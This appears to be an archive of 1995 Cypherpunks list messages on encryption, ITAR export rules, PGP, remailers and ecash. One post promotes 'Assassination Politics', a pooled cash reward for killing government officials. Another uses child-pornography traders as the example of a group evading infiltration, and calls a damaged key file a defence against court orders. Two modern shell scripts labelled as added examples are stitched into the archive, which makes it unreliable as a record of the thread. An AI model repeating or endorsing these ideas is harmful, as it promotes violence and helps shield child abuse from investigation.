disk storage problem. It also gives them the solution to the "rubber hose"
problem. With a "damaged" key file and the use of a password, they have
an effective defense against court orders demanding keys. (see the docs
for SecureDrive 1.4). Also disk encryptors not only encrypt files but also
solve the problem of temporary work files that are used by many software
packages (They can be reconstructed).

                TELECOMMUNICATIONS SECURITY

   MIT's PGP 2.6.2 solves their problem of secure telecommunications.
This assumes that the people involved can really trust each other.


                 STATE INFILTRATOR PROBLEM

   Of course, one of the really big problems for non-STATE approved
groups is the problem of state agents infiltrating the group. This gets
worse as the group gets bigger. This is also one more thing I have against
states - one of their jobs is having their agents make friends with cit-
izens and then betray their friends. Has anyone else noticed? -  THE STATE
HAS NO HONOR! The state prides itself on its cleverness here.

   Also, of course, once the state has entrapped an individual, they tend
to get other members of the group by having their victims get and give
evidence against other members. - sort of a domino effect and the group
unravels - especially with the conspiracy laws. Drug distribution gangs
are famous for falling to these techniques.

   A possibly unbreakable defense against the above assault would be the
use of a Dining Cryptographers protocol. According to Applied Crypto-
graphy, PGP may be used to send messages in these protocols. Pretend that
a small group of Cypherpunks are child porn enthusiasts and decide to use
the Cypherpunk mailing list to exchange pictures and child porn info..

   I know little of the theory of Dining Cryptographers but I would think
that a good implementation of it would make infiltrators useless. I will
leave it for other Cypherpunks to discuss the mechanics (specific and
general) for actually doing this.

   A possible risk would be that this would put the general membership of
Cypherpunks at risk - or would it just put the list itself to risk? Does
this imply that we need FORTRESS mailing lists or what others would des-
cribe as COERCION-FREE mailing lists? Would remailers that allow two way
secure communication be a help here? Would they be forced to be FORTRESS
or COERCION-FREE to be effective?  Should they use expendable lists?:-)

   Generally, if you wanted to start a discussion group on a forbidden
topic on the Internet, and wanted to keep it secure - how would you do
it? Today this is an academic question - but tomorrow? :-) Aside from
workable anonymous Internet money, the two most needed computer privacy
technologies are fortress mailing lists and remailers and workable Dining
Cryptographers protocols.


THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 25 Nov 1995 06:49:25 +0800
To: cypherpunks@toad.com
Subject: RE: establishing trust
Message-ID: <199511241600.KAA30794@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


            RE: establishing trust

   Question: What's a WEB OF TRUST with STATE agents in it?
   Answer: - a DRIFTNET!  U heard it here first. :-)

THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 24 Nov 1995 23:59:44 +0800
To: sameer <sameer@c2.org>
Subject: "lack" of export control rules
In-Reply-To: <199511240523.VAA03642@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951124054104.12402A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 23 Nov 1995, sameer wrote:

 a> The feds have never established a general policy.
 a> 

    in other words, business as usual with the Feds. If there is no "book"
on what is or is not legal v/v ITAR, and the agency responsible will not
communicate, it empirically says:  "...well, be reasonable to meet the
intent of the law, but we will not tell you what is really expected;
however, if, in the future, we decide what we really want, we will bust
you if you did not fully comply despite your good intentions --and, if
that does not fly, we'll charge you with conspiracy...." 

    having been down the road a couple times including being charged with 
technology export for things which are essentially combinations of common 
knowledge, if nothing else works for the Feds, conspiracy will --and it 
carries the same penalties as the "crime" itself.  No small wonder the 
Europeans, including the British, laugh at our "legal" system.

 a> > if a solid (or reasonably accurate given the feds refusal
 a> > to put anything in writing) FAQ can be assembled, it would be worth
 a> > posting as a resource.
 a> >
 a> >     I had thought the feds were requiring that you at least verify the
 a> > address of the party requesting the code --at least as far as screening
 a> > out the obvious ones like .uk or .de and the like --which is far from
 a> > foolproof.  There has been mention someplace that they also expect some
 a> > screening by verifying numbers, not just names.
 a> >
 a> >     I guess the real question, just how much checking do they expect?
 a> > checking for country domains is easy enough, and the 'foolers' in 
 a> > .edu group can be listed, but there are plenty of other deceptions 
 a> > if you control the machine since communication inevitably works by 
 a> > the numbers which is a whole new ball of wax.
 a> >
 a> > On Tue, 21 Nov 1995, sameer wrote:
 a> >
 a> > > #!/bin/sh 
 a> > > umask 022
 a> > > DIRNAME=`cat $HOME/.usonlydir`
 a> > > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
 a> > > cd /u1/ftp/pub/US-only
 a> > > mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
 a> > > cd ..
 a> > > sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
 a> > > mv README.new README.US-only
 a> > > echo $NEWDIRNAME > $HOME/.usonlydir
 a> >





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 24 Nov 1995 23:59:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <Pine.BSD.3.91.951124073019.12402G-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 23 Nov 1995, jim bell wrote:

>  Jeff Simmons <jsimmons@goblin.punk.net> said...
>
	[SNIP] 

> >
> >I have the feeling that we're talking about two different things here - the
> >law as it's practiced in the courtroom and the law as it's practiced on the
> >'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
> >won't help much if the government decides to do a Phil Zimmerman on me.
> >But I would be interested in your comments.
> 
   On Thu, 23 Nov 1995, jim bell wrote: 
 
> I very much agree with the direction you appear to be headed in.  It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.  
> 
> 
> In addition, why should they even need to write the encryption part of their
> software IN the US?  It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
> 
    <attila sez>  I think they have that one covered --not only is it 
violation of ITAR's intent to send a programmer out of the U.S., but is 
illegal to hire a foreign national to program for your non-U.S. products.
    the test is going to be with someone like Sun who "bought" a group of 
Russian crypto programmers and left them in Russia.  Now, the problem 
with ITAR is that if you import that code, you can not then export the 
code since it is now covered by ITAR.
    secondly, it appears there is a move afoot to make it an ITAR 
violation to hire the foreign nationals to circumvent ITAR --basically, 
the Feds want to stop cryptography _everywhere_, including telling 
Russians they can not work for U.S. companies!  Just where do they think 
they are getting off?

    then, when ALL hitech moves out of the U.S. and the DoD needs us, we 
will not be here, will we?  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Fri, 24 Nov 1995 18:02:04 +0800
To: cypherpunks@toad.com
Subject: Re: real life problems with ITAR (was Spam the Sign!)
Message-ID: <604.9511240945@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Attila <attila@primenet.com> writes:
>    On Thu, 23 Nov 1995, jim bell wrote: 
>  
> > [US companies hiring non-US programmers to avoid ITAR]
> 
>     <attila sez>  I think they have that one covered --not only is it 
> violation of ITAR's intent to send a programmer out of the U.S., but is 
> illegal to hire a foreign national to program for your non-U.S. products.

Having your company legally based outside the US, with just a US
office (on paper) would seem to get around this.  If all your code is
shipped from Sun Corp, Russia (and actually you get CDs in the mail
from Russia literally if you order software from them), then it would
seem to avoid the problem.  They'd probably have to make sure that no
programming at all occurred in the US otherwise they'd be susceptible
to the claim that they were violating ITAR by their US development
team exporting software with a hole for crypto to their main
development team in Russia.

Multinationals could juggle that much easily.

The other problem is that multi-nationals don't like stepping on the
govt's toes, because the govt might retaliate by not buying Sun, or Sun
mysteriously losing contracts.  Sound right?

>     the test is going to be with someone like Sun who "bought" a group of 
> Russian crypto programmers and left them in Russia.  Now, the problem 
> with ITAR is that if you import that code, you can not then export the 
> code since it is now covered by ITAR.

However this is the real problem, they don't want crypto no matter
what.  They'll do their damnedest to stop it by whatever means: legal or
illegal, monetary pressure, threats, FUD, overbroad ITAR, selective
enforcement, etc.

>     secondly, it appears there is a move afoot to make it an ITAR 
> violation to hire the foreign nationals to circumvent ITAR --basically, 
> the Feds want to stop cryptography _everywhere_, including telling 
> Russians they can not work for U.S. companies!  Just where do they think 
> they are getting off?
> 
>     then, when ALL hitech moves out of the U.S. and the DoD needs us, we 
> will not be here, will we?

Something that is puzzling me is how DigiCash is doing.  Their
software I think is ITAR regulated (or would be if it were shipped
from a US ftp site).  OK, so they get around it by shipping their
software from Digicash, Bv, Netherlands.

But, somewhere on their pages it mentions that: "Digicash, Bv is a
wholly owned subsidiary of Digicash" (which *is* based in the US).

Does that make them a counter example who is currently getting away
with it?  Just to complicate things further David Chaum is a US
citizen, right?  Maybe he himself is ok because he doesn't write the
code himself, the digicash development team does.  Is Digicash (US)
hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
in US legal terms?

Reckon the long term message is for companies to just pull out of the
US.  Moving to a suitable jurisdiction would be possible for Netscape,
and would be a coool blow against ITAR.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 01:41:00 +0800
To: attila <attila@primenet.com>
Subject: Re: real life problems with ITAR (was Spam the Sign!)
Message-ID: <m0tJ1o2-0008zJC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



Attila@primenet.com said:

>   On Thu, 23 Nov 1995, jim bell wrote: 
> 
>> I very much agree with the direction you appear to be headed in.  It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.  
>> 
>> 
>> In addition, why should they even need to write the encryption part of their
>> software IN the US?  It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto."  He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>> 
>    <attila sez>  I think they have that one covered --not only is it 
>violation of ITAR's intent to send a programmer out of the U.S.

Well, don't assume that because something's a "violation of ITAR's INTENT"
it is actually a violation of ITAR.    It can't be assumed that ITAR is
_perfect_:  That it actually prohibits every activity the government that
wrote it didn't like.

>, but is
>illegal to hire a foreign national to program for your non-U.S. products.

Sure about this?!?

>    the test is going to be with someone like Sun who "bought" a group of 
>Russian crypto programmers and left them in Russia.  Now, the problem 
>with ITAR is that if you import that code, you can not then export the 
>code since it is now covered by ITAR.

I didn't say that the code would ever be "re-exported":  A copy would be
brought into the US for domestic use, and everyone else outside the border
would get their own copy from an outside server. 


>    secondly, it appears there is a move afoot to make it an ITAR 
>violation to hire the foreign nationals to circumvent ITAR --basically, 
>the Feds want to stop cryptography _everywhere_, including telling 
>Russians they can not work for U.S. companies!  Just where do they think 
>they are getting off?

It is for this kind of problem that I "invented" my concept of
"Assassination Politics":  If everybody pissed off at this situation was
willing to donate $10 to a fund to reward the deaths of a few government
officials responsible for ITAR, I can well imagine that this would shake
them up a bit.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 25 Nov 1995 00:14:46 +0800
To: cypherpunks@toad.com
Subject: CJR_war
Message-ID: <199511241605.LAA19328@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   SciAm, December, 1995:


   "Fighting Future Wars. U.S. military planners may be
   preparing for the wrong conflict."

      Policy experts, technical gurus and defense contractors
      have begun to study a range of other potential threats,
      from a newly hatched superpower to a regional power with
      dramatically altered fighting tactics, to legions of
      mercenary hackers that bring down banks and stock
      exchanges with computer viruses and other malevolent
      software. The vast array of scenarios is a measure of
      the speculative turn that has gripped the
      military-planning establishment.

      Debate on high-tech fighting culminates in the question
      of whether information technologies -- a computer virus,
      for one -- could make conventional military hardware
      obsolete and whether they would make possible a virtual
      invasion of the continental U.S. A battle of the bits
      would be fought by destroying an enemy's information
      assets, its financial, electrical, telecommunications
      and air-traffic-control networks. Direct strikes at the
      military would not be ruled out: cracking a government
      computer is already a not infrequent hacker rite of
      passage. In addition, more than 95 percent of military
      communications travel over public networks.


   CJR_war













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 25 Nov 1995 00:16:45 +0800
To: cypherpunks@toad.com
Subject: SEL_ane
Message-ID: <199511241607.LAA19557@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   As previously noted here: SciAm, December, 1995:


   "Confidential Communication on the Internet." By Thomas
   Beth, director of the European Institute for System
   Security and professor of computer science at the
   university of Karlsruhe.

      Chain of certification in the author's scheme, SELANE,
      extends from local authorities who vouch for an
      individual's identity and probity up through regional,
      national and supranational authorities, each vouching
      for those below it. Digital signatures prevent
      tampering; anyone who recognizes one signature in the
      chain can be assured that a signed document is valid.

      SELANE is compatible with almost every commercial and
      academic network. It also provides a "smart" card that
      can carry out the necessary calculations securely for
      each user. And it addresses the conflicts of government
      and privacy interests when wire-tapping is needed.


   SEL_ane








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kenney <saken@chardos.connix.com>
Date: Sat, 25 Nov 1995 01:05:38 +0800
To: mix-l@jpunix.com
Subject: ANNOUNCE - Amnesia Remailer now public
Message-ID: <199511241656.LAA05960@chardos.connix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 25 Nov 1995 06:50:35 +0800
To: "Mark M." <markm@omni.voicenet.com>
Subject: Re: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <9511241106.AA20922@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. writes:
 > I just used the following simple shell script.  Not very secure but does
 > the trick for the purposes of export controlled directories.
 > #!/bin/sh
 > (date; uptime; ps -e; netstat; set) | md5sum
That one is quite good, you could also feed $1 which would be the
previous "pass".
Btw I'd suggest that you use netstat -n if you don't want it to take
ages to resolve all the IP->name.


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

PLO [Hello to all my fans in domestic surveillance] Mossad FSF class
 struggle explosion hack
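
An added example, not code posted by anyone in this thread: sameer's rotation script quoted earlier and the generator discussed in this message, combined into one POSIX shell file. It feeds the previous token in as `$1` and uses `netstat -n` as suggested above; the `/dev/urandom` read, the token validation and the three-argument `rotate_dir` interface are assumptions of this example.

```shell
#!/bin/sh
# Added example: token generator plus directory rotation for an
# export-controlled FTP area. Function names and arguments are hypothetical.

# new_token PREVIOUS
# Hash volatile system state together with the previous token. The listed
# commands are the ones from the thread; on a quiet machine their output is
# guessable, so 32 bytes from the kernel random device are mixed in as well
# (an addition of this example). Prints 32 hex digits.
new_token() {
    {
        printf '%s\n' "$1"
        date
        uptime 2>/dev/null || true
        ps -e 2>/dev/null || true
        netstat -n 2>/dev/null || true   # -n: no IP->name lookups
        set
        head -c 32 /dev/urandom 2>/dev/null || true
    } | md5sum | cut -d' ' -f1
}

# rotate_dir DIR README STATEFILE
# DIR holds I_will_not_export_<token>/, README mentions the token, and
# STATEFILE stores the current token. Prints the new token on success.
rotate_dir() {
    dir=$1 readme=$2 state=$3
    old=$(cat "$state") || return 1
    # The stored token is interpolated into a path and a sed pattern, so
    # accept nothing but 32 lowercase hex digits.
    case $old in
        ''|*[!0-9a-f]*) return 1 ;;
    esac
    [ "${#old}" -eq 32 ] || return 1
    [ -d "$dir/I_will_not_export_$old" ] || return 1
    new=$(new_token "$old") || return 1
    [ "${#new}" -eq 32 ] || return 1
    umask 022
    mv "$dir/I_will_not_export_$old" "$dir/I_will_not_export_$new" || return 1
    sed -e "s/$old/$new/g" "$readme" > "$readme.new" || return 1
    mv "$readme.new" "$readme" || return 1
    # Write the state through a temporary file so a crash cannot leave it empty.
    printf '%s\n' "$new" > "$state.tmp" || return 1
    mv "$state.tmp" "$state" || return 1
    printf '%s\n' "$new"
}

# Cron usage with the paths from the quoted script:
#   rotate_dir /u1/ftp/pub/US-only /u1/ftp/pub/README.US-only "$HOME/.usonlydir"
```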




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 25 Nov 1995 02:28:44 +0800
To: cypherpunks@toad.com
Subject: Re: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <604.9511240945@exe.dcs.exeter.ac.uk>
Message-ID: <4952bt$595@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <604.9511240945@exe.dcs.exeter.ac.uk>,  <aba@atlas.ex.ac.uk> wrote:
>Something that is puzzling me is how DigiCash is doing.  Their
>software I think is ITAR regulated (or would be if it were shipped
>from a US ftp site).  OK, so they get around it by shipping their
>software from Digicash, Bv, Netherlands.
>
>But, somewhere on their pages it mentions that: "Digicash, Bv is a
>wholly owned subsidiary of Digicash" (which *is* based in the US).
>
>Does that make them a counter example who is currently getting away
>with it?  Just to complicate things further David Chaum is a US
>citizen, right?  Maybe he himself is ok because he doesn't write the
>code himself, the digicash development team does.  Is Digicash (US)
>hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
>in US legal terms?

<IANAL>
Even if DigiCash gave a <exon> about ITAR and the NSA, ecash probably
wouldn't be covered anyway, because the ITAR has a specific exception
for encrypting financial data (that's so you can use your credit and bank
cards overseas).
</IANAL>

   - Ian "What's with this day-after-thanksgiving, anyway...?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 25 Nov 1995 05:47:24 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To: <Pine.SUN.3.91.951124152336.28283G-100000@viper.law.miami.edu>
Message-ID: <Pine.SOL.3.91.951124133617.25364A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Michael Froomkin wrote:
> 
> I've heard this story several times from many different people.  Anyone
> have any evidence that it's true? (My friends at Sun say they haven't
> heard the story, but don't work in the parts that would have necessarily
> heard it.)

It sounds like something I heard from John Gage, though the rumors may be 
getting conflated with Sun's purchase of the entire Soviet super-computer 
industry in (I think) '92. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Sat, 25 Nov 1995 05:57:36 +0800
To: Tim Philp <x93ojg@juliet.stfx.ca>
Subject: Re: PGP in Canada
In-Reply-To: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
Message-ID: <9511241348.ZM19179@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 23,  7:41, Tim Philp wrote:
> Subject: Re: PGP in Canada
> You can try to get PGP from the MIT site but it may not allow you to do
> so if it does not recognize your address as being Canadian.

You can also get pgp from a Canadian site.

Get the file

ftp://ftp.wimsey.com/pub/crypto/software/README

for instructions and conditions (export restrictions).

-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 Nov 1995 03:49:41 +0800
To: gjeffers@socketis.net
Subject: Re: crypto for porno users
Message-ID: <01HY0WLMKRLG8WYLO9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: gjeffers@socketis.net (Gary Jeffers)

   The SecureDrive 1.4 disk encryptor system solves their computer site
disk storage problem. It also gives them the solution to the "rubber hose"
problem. With a "damaged" key file and the use of a password, they have
an effective defense against court orders demanding keys. (see the docs
for SecureDrive 1.4). Also disk encryptors not only encrypt files but also
solve the problem of temporary work files that are used by many software
packages (They can be reconstructed).
-----------------------
	Does anyone know of any strong encryptor systems that encrypt a
MS-DOS directory with subdirectories, as opposed to a partition? Aside from
convenience, this does have the potential advantage that if you did some FAT,
etcetera manipulation, it wouldn't be possible to figure out what was garbage
and what was encrypted without the program running properly (i.e., have an
emergency hotkey combination that wiped the currently used password/phrase and
removed the program and the alterations to the FAT).
	Also nice would be working off of a key on a 3.5" floppy, so it can
be removed when not in use (thus reducing the need for typing in a
password/phrase every few minutes). It should be compatible with Stacker and
similar compression systems if possible, although it could also be run on the
uncompressed drive- that way it'd take up more space, however.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Sat, 25 Nov 1995 06:58:50 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124152257.5757A-100000@micro.internexus.net>
Message-ID: <Pine.SUN.3.90.951124143054.15604C-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Laszlo Vecsey wrote:

> > > Where can one get PGP burnt into cdrom? Or the equipment to do it
> > 
> > If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> > at the start of next year ...
> 
> Would PGP on CD-ROM truly guarantee a corrupt/virus free executable? A 
> virus already running in memory could tamper with what it's doing, 
> perhaps extracting the necessary keys and dumping them to a log file.
> This would be especially dangerous on a UNIX system where many people 
> might be using PGP, thinking it is secure.
> 
> I think the only way to be safe is to actually boot up off of the CD-ROM, 
> and hope that the hardware in your computer physically hasn't been 
> tampered with :)
> 

My original post mentioned two things, the other was to cross-compile the 
sources.  Maybe do it on 3 different systems (e.g. Sun, HP and DEC), and 
compare the binaries, then burn a CD.  A virus would have to be very 
versatile to infect multiple platforms and insert code for another.

It would also be silly for a virus to just dump keys when PGP runs, it 
would be far easier to look for any occurrence of secring.pgp, and mail 
it, and/or monitor when it was opened and record keystrokes.  And log files
must go somewhere.

I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory 
cards that aren't in the system at the same time as a network or modem 
card.  Moreover I can also simply use the DOS version (I use linux to 
communicate) - It would require quite an effort to create a virus that 
would work and pass data across the required OS problems and not break 
with the twice a week kernel-level changes :).

ViaCrypt also has a PCMCIA implementation of pgp, and it should be fairly 
easy to implement in an ASIC, or small embedded micro.  That would be 
much harder to compromise.  Of course anything so useful commercially 
would be the subject of our legal system.

It takes quite an effort to create a complex virus to do this.  It 
reminds me of the Glomar Challenger that was used to recover the remains 
of a Russian sub (my memory is somewhat faulty).  Such a virus would 
require a great investment in time and money.  What target would be worth it?
Many otherwise feasible things aren't economically practical.

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key
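
One way to carry out the comparison step described in this message, as an added example that is not the poster's own code. It assumes the binaries built on the different hosts have been copied to one machine as files, that `sha256sum` is available, and that the toolchains emit byte-identical output for identical sources; the function name `compare_builds` is hypothetical.

```shell
#!/bin/sh
# Added example: compare binaries produced by independent builds of the same
# sources before mastering them onto read-only media.

# compare_builds FILE...
# Prints one "<count> <digest>" line per distinct digest, most common first,
# then a "DISSENT <file>" line for every file that does not match the most
# common digest. Returns 0 only when all files are identical, 1 when any
# differ, 2 on usage or read errors. When every build differs there is no
# real majority and the reference digest is arbitrary.
compare_builds() {
    [ "$#" -ge 2 ] || { echo "need at least two builds" >&2; return 2; }
    sums=$(sha256sum -- "$@") || return 2

    # Tally the digests (first 64 characters of each sha256sum line).
    tally=$(printf '%s\n' "$sums" | cut -c1-64 | sort | uniq -c | sort -rn)
    printf '%s\n' "$tally" | awk '{ print $1, $2 }'

    majority=$(printf '%s\n' "$tally" | awk 'NR == 1 { print $2 }')
    distinct=$(printf '%s\n' "$tally" | awk 'END { print NR }')

    # Name the builds that disagree so they can be rebuilt or inspected.
    printf '%s\n' "$sums" | while read -r digest file; do
        [ "$digest" = "$majority" ] || printf 'DISSENT %s\n' "$file"
    done

    [ "$distinct" -eq 1 ]
}

# Usage: compare_builds pgp.sun pgp.hp pgp.dec && echo "builds agree"
```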





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Sat, 25 Nov 1995 06:36:09 +0800
To: "JackShimek@aol.com>
Subject: Fwd: Re: using ecash
Message-ID: <199511242334.PAA03668@chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

------- FORWARD, Original message follows -------

Date: Friday, 24-Nov-95 03:38 PM

From: Mark Twain Ecash Support \ Internet:    (mtwain@netcom.com)
To:   J. Kent Hastings         \ Internet:    (zeus@pinsight.com)

Subject: Re: using ecash

> During the "play money" beta test, I saw "BEGIN E-CASH PAYMENT" messages
> that looked like a PGP format.

> I'd like to know if the Mark Twain "real money" US Dollar software has this
> feature, too.

Mark Twain Ecash does allow for ASCII email payments.

> The "heavy user" personal account has a 3 percent fee to withdraw, but
> verify that just to make sure.

With a Heavy User account you can move a hundred USD in or out of the  Mint
free of charge.

For the second hundred USD the rate is 3%, but the money movement fee  is
counted against your monthly fee of $2, so you only pay 3$ - 2$ =  1$ for
the second hundred.


-- Mark Twain Ecash Support
   <mailto:support@marktwain.com>
   <http://www.marktwain.com/ecash.html>


------- FORWARD, End of original message -------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sat, 25 Nov 1995 03:26:43 +0800
To: Thomas E Zerucha <zerucha@shell.portal.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.SUN.3.90.951120144320.25327E-100000@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



    Where can one get PGP burnt into cdrom? Or the equipment to do it
             Thanks in advance
                 moroni





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sat, 25 Nov 1995 08:04:37 +0800
To: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Subject: Re: crypto for porno users
In-Reply-To: <199511232149.PAA21305@khijol>
Message-ID: <Pine.LNX.3.91.951124151506.7425B-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


I wish we could get off the subject of the kiddie porn, it makes me 
wonder what people on this list are doing when they are not mailing out 
letters. Not to flame, BUT it is such a serious issue and we all as 
adults and approaching adults should not treat it as an academic issue. 
It is the most victimizing of all crimes and I think I speak for some of 
us when I say that it would be better if we all found a way to get back 
to discussing the problems of cryptography as related to us, not 
pornographers.

               Thanks in Advance 
                     moroni





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 25 Nov 1995 04:36:09 +0800
To: attila <attila@primenet.com>
Subject: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To: <Pine.BSD.3.91.951124073019.12402G-100000@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.951124152336.28283G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, attila wrote: [....]
>     the test is going to be with someone like Sun who "bought" a group of 
> Russian crypto programmers and left them in Russia.  Now, the problem 
> with ITAR is that if you import that code, you can not then export the 
> code since it is now covered by ITAR.
[....]

I've heard this story several times from many different people.  Anyone
have any evidence that it's true? (My friends at Sun say they haven't
heard the story, but don't work in the parts that would have necessarily
heard it.)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 25 Nov 1995 04:39:43 +0800
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Virus attacks on PGP
In-Reply-To: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.951124152257.5757A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> > Where can one get PGP burnt into cdrom? Or the equipment to do it
> 
> If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> at the start of next year ...

Would PGP on CD-ROM truly guarantee a corrupt/virus free executable? A 
virus already running in memory could tamper with what it's doing, 
perhaps extracting the necessary keys and dumping them to a log file.
This would be especially dangerous on a UNIX system where many people 
might be using PGP, thinking it is secure.

